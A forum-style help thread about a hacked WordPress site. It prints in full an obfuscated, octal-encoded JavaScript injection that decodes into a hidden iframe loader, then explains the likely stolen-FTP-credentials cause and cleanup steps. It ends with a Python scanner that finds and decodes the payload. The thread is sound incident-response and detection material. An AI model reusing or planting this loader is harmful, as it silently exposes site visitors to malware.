
Need to find out how malicious Javascript was injected into my header.php Wordpress theme file

Unfortunately my site was blocked for containing Malicious Javascript by AVG and Google. The malicious code pasted below was somehow injected into the header.php theme file on the latest version of Wordpress. I checked all the files and removed any suspicious-looking plugins to make sure this doesn't happen again. The theme is from a very reputed vendor, so I can't see it happening because of the Theme. I am looking to know how this was done so that it doesn't happen again.

Host: 1&1 Hosting
WordPress: 3.5.1
PHP: 5.2.17
Running on: Apache

Here is the malicious code:

<script type="text/javascript" language="javascript">
ss=eval("Str"+"ing");d=document;a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,174,174,176,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,174,174,176,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,150,151,161,163,62,147,163,162,170,166,163,160,145,150,161,155,162,155,167,170,166,145,170,155,172,163,62,162,151,170,63,150,170,150,62,164,154,164,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,174,174,176,162,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,174,174,176,162,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,174,174,176,162,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,174,174,176,162,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,1
70,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152
,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>

The code you posted above is usually an indication of stolen FTP credentials.

I'm not certain if 1and1 gives you access to FTP logs, but if so, look in there. You may find proof. But we've cleaned over 160,000 websites and we've seen that exact code in sites where we do have access to the FTP logs, and in every case it's been stolen FTP credentials.

The hackers know that many people have FTP access to websites. So their viruses are designed to steal FTP passwords. First, change all passwords. Then don't login until after you've run a full virus scan of your computer. Don't give out the new passwords until others have run a full system virus scan of their computer.

A good virus cleaner is Malwarebytes.

One thing you should do is to search all files for the string: 44,152,171 (in your case). The reason is that while you'll find the above code in .htm/.html/.js files, in .php files the hackers use mostly the same code, but it's "echo'd", so many of the special characters are escaped in the .php code.

You'll see maybe an opening php tag <?php or short version <? followed by a series of spaces, then an identifier #879076# (for instance), then more spaces, then "echo " followed by more spaces and then the opening script tag.

The added spaces are designed to try and hide the malicious code off the screen when viewed with a text editor.
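As an added example (not part of the question or the answer above), a small Python scanner that does what the answer recommends: it searches a web root for the 44,152,171 signature, recognises the PHP "echo" wrapper with its space padding and #879076#-style identifier, and decodes the start of the octal array (the loader's own parseInt(a[i],8)-(7-3) step in reverse) so a defender can see what was injected. Function names, the regexes and the constructed sample file content are assumptions of this example.

```python
import os
import re

# Search string the answer recommends: the start of the octal array.
SIGNATURE = "44,152,171"
# PHP dropper shape from the answer: <?php or <?, padding, an identifier
# like #879076# (number varies per infection), padding, then echo.
PHP_ECHO_RE = re.compile(r"<\?(?:php)?[ \t]+#\d+#[ \t]+echo[ \t]+")
OCTAL_ARRAY_RE = re.compile(r"[0-7]+(?:,[0-7]+)*")

def decode_octal_array(csv_numbers):
    """Undo the loader's parseInt(a[i], 8) - (7 - 3) step, for analysis."""
    return "".join(chr(int(tok, 8) - 4) for tok in csv_numbers.split(","))

def scan_text(text):
    """Return a finding dict for one file's content, or None if it is clean."""
    idx = text.find(SIGNATURE)
    if idx == -1:
        return None
    before = text[text.rfind("\n", 0, idx) + 1:idx]   # same line, up to the hit
    array = OCTAL_ARRAY_RE.match(text, idx).group(0)
    return {
        "offset": idx,
        # Longest run of spaces before the payload on its line: the
        # off-screen padding trick the answer describes.
        "padding_run": max((len(r) for r in re.findall(r"[ \t]+", before)), default=0),
        "php_echo_wrapper": PHP_ECHO_RE.search(text[:idx]) is not None,
        "decoded_preview": decode_octal_array(array)[:40],
    }

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root and report every file carrying the signature."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hit = scan_text(fh.read())
                if hit:
                    findings[path] = hit
    return findings

# Constructed sample: the first 18 values of the array from the question,
# wrapped the way the answer says the code appears in an infected .php file.
SAMPLE_PHP = ("<?php" + " " * 80 + "#879076#" + " " * 80 + "echo "
              '"<script>a=(\\"44,152,171,162,147,170,155,163,162,44,176,176,'
              '176,152,152,152,54,55\\"[\\"split\\"](\\",\\"));</script>"; ?>')
```

Run scan_tree("/path/to/webroot") against a copy of the site; a hit with a large padding_run and php_echo_wrapper set is the .php variant the answer describes.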
